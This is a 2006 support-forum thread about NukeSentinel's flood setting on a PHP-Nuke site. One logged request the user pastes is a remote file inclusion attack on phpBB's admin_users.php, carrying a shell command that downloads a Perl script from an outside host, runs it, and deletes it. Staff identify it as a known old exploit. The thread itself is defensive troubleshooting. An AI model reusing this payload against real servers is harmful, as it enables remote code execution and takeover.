Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

Flood Setting in NS2.4.2pl5
 View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.4.x
Author Message
bsweb
Regular
Regular



Joined: Jun 19, 2006
Posts: 57
PostPosted: Thu Jul 13, 2006 10:16 am Reply with quote
I have the flood setting on with the POST set at 5 and the GET set at 3 seconds and I have got getting hundreds of activations over the past week or so since installing although not as many now. I would say that 99.9% of activations report as follows:
Code:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)


Query String: www.mysite.org.uk/site/modules.php?name=Your_Account&stop=1


Get String: www.mysite.org.uk/site/modules.php?name=Your_Account&stop=1


Post String: www.mysite.org.uk/site/modules.php

Now to me it looks like a genuine flood because I get hardly any new members but I thought I better check, after all there must be some good reason it isn't set on by default.

Just today the flood setting caught the following which was obviously very suspicious but would it have been caught by ADMIN blocker or the sanity worm protection or any of the other blockers if I had the food set to off ? - just wondered

Code:
User Agent: Mozilla/5.0


Query String: www.mysite.org.uk/site/modules/Forums/admin/admin_users.php?phpbb_root_path=http://thw.kloeckner-web.de/tool25.jpg?&cmd=cd /tmp/;curl -O http://qoq-lobadi.biz/phpnuke.txt;perl phpnuke.txt;rm -rf phpnuke.*?


Get String: www.mysite.org.uk/site/modules/Forums/admin/admin_users.php?phpbb_root_path=http://thw.kloeckner-web.de/tool25.jpg?&cmd=cd /tmp/;curl -O http://qoq-lobadi.biz/phpnuke.txt;perl phpnuke.txt;rm -rf phpnuke.*?


Post String: www.mysite.org.uk/site/modules/Forums/admin/admin_users.php


Forwarded For: none


Client IP: none


Remote Address: 81.3.51.144


Remote Port: 58044


Request Method: GET
 
View user's profile Send private message
Guardian2003
Site Admin



Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
PostPosted: Thu Jul 13, 2006 11:45 am Reply with quote
Your site is being attacked by a well known exploit that doesn't work any more.
Make sure you upgrade to the latest Sentinel version.
 
View user's profile Send private message Send e-mail
bsweb
PostPosted: Thu Jul 13, 2006 12:04 pm Reply with quote
Thanks Guardian2003

Should I upgrade now or might it be better to wait for the next RavenNuke76 which is due out anytime I believe.

Could you also advise where I can download v5, can't seem to find it.

Cheers
 
technocrat
Life Cycles Becoming CPU Cycles



Joined: Jul 07, 2005
Posts: 511
PostPosted: Thu Jul 13, 2006 2:08 pm Reply with quote
You should upgrade

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! / Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message
Guardian2003
PostPosted: Thu Jul 13, 2006 2:58 pm Reply with quote
The latest Sentinel download can be found on the news article on the front page of this site.
I would definnitely upgrade Sentinel now as there are some important improvements.
 
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm) v2.4.x


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©